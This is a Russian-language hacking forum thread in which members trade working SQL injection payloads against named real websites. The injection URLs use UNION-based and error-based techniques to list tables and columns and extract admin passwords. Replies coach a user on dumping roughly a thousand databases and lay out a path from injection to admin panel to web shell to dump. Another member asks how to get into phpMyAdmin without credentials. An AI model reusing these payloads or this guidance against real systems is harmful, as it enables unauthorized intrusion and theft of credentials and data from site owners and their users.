Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,3,4,5,GrOuP_CoNcAt(TaBlE_NaMe),7,8,9+from+information_schema.columns--

    :) вывод в title
     
    _________________________
  2. Алкорайдер

    Joined:
    3 Jun 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Подскажите плз как слить бд
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    тебя посадят :(

    а может скажешь что есть под рукой? шелл/админка/ и тп..или ничего? )
     
    _________________________
  4. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    вообщет ето не таблички...
    title необязательно,так удобнее..
    спс.

    http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,GrOuP_CoNcAt%28TaBlE_NaMe%20%29,4,5,6,7,8,9+from+information_schema.tables--
     
  5. Алкорайдер

    Joined:
    3 Jun 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Врятли :)

    Ничего, только sql-inj, но какбы там база огромная, поэтому хочу как-нибудь слить бд
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    man я просто подумал что там фильтр на information_schema.tables поэтому сделал выборку из columns ;)
     
    _________________________
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    инъекция->админка->shell->дамп

    или

    инъекция->shell->дамп :)
     
    _________________________
  8. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    инъекция->дамп (долго но можно=) )
     
  9. Алкорайдер

    Joined:
    3 Jun 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Я немного не правильно выразился :)
    Почти 1к БД, нужно как-то это всё слить и разобраться где там таблица с админскими пассами, т.к через inject там шелл не получается залить

    вот примерно так всё это выглядит, половина БД пустые :(
     
  10. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    сделай запрос на вывод по другому..если админы в той же табелке что и обычные юзвери они отличаются статусом, левелом .попробуй что то типа : www.site.ru/news.php?id=[sql]+union+select+1,2,3,password+from+users+where+user_level=1--

    ну или что то наподобее этого, все зависит от данных в твоей табличке с аккаунтами
     
  11. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    Алкорайдер. В следующий раз делай скрин как, "черный квадрат малевича" ..

    Как вариат, ищи вручную...
    http://www.mynhw.co.uk/news-full.php?id=-644+UNION+SELECT+1,2,group_concat(table_name,0x3a,column_name),4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+column_name+like+0x257061737325

    Я халосий :rolleyes:
     
    #13811 v1d0qz, 26 Jun 2010
    Last edited: 26 Jun 2010
    1 person likes this.
  12. Алкорайдер

    Joined:
    3 Jun 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Телепат, не? :D
    Пробовал сам разобрать что там за урл, не получилось, думал норм замазал

    Ок, попробую, спасибо :)
     
    1 person likes this.
  13. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Это безусловно ясно, я всего лишь предложил, как альтернативный вариант, тем более ограничение при group_concat() легко обходится substring(), а "лишнее" тоже можно исключить из вывода! Пример:
    Code:
    SELECT substring(GROUP_CONCAT(DISTINCT table_schema separator 0x0a),0,512)
    FROM information_schema.tables
    Долго и муторно это :)
     
    #13813 DrAssault, 26 Jun 2010
    Last edited: 26 Jun 2010
  14. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Есть сайт с phpMyAdmin 2.11.8.1. Можно ли как нибудь войти в пхпмайадмин не имея логина и пароля?
    Нашел вот этот эксплоит, но не могу понять, что он мне даст =\.
    И что прописать в:
    ?
    Точнее как узнать полный ftp-путь до файла с содержимым <? phpinfo();exit; ?>?
     
  15. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Загружаешь на свой ФТП файл test.txt с содержимым нужным, в скрипте указываешь адрес своего ФТП.
     
  16. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    вроде блайнд,версия 5 хелп!!!
    Code:
    http://www.plan-art.co.uk/case.php?id=116+and+substring(@@version,1,1)=5--
     
  17. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--
     
    1 person likes this.
  18. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    неплохо, но хотелосьбы получить еще базы,таблички,колонки...и потом выдрать инфу из таблички...
    желательно в подробностях...
     
  19. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    table_name:
    Code:
    http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0),concat((select+table_name),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)+--+
    admin
    column_name:
    Code:
    http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0),concat((select+column_name),floor(rand(0)*2))+from+information_schema.columns+where+table_name='admin'+group+by+2)a)+--+
    password

    Вместо version() пиши то, что тебе нужно.
     
  20. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    С каким содержимым файл? В скрипте этом?

    И вообще можете объяснить, что сделает этот скрипт?
     
Thread Status:
Not open for further replies.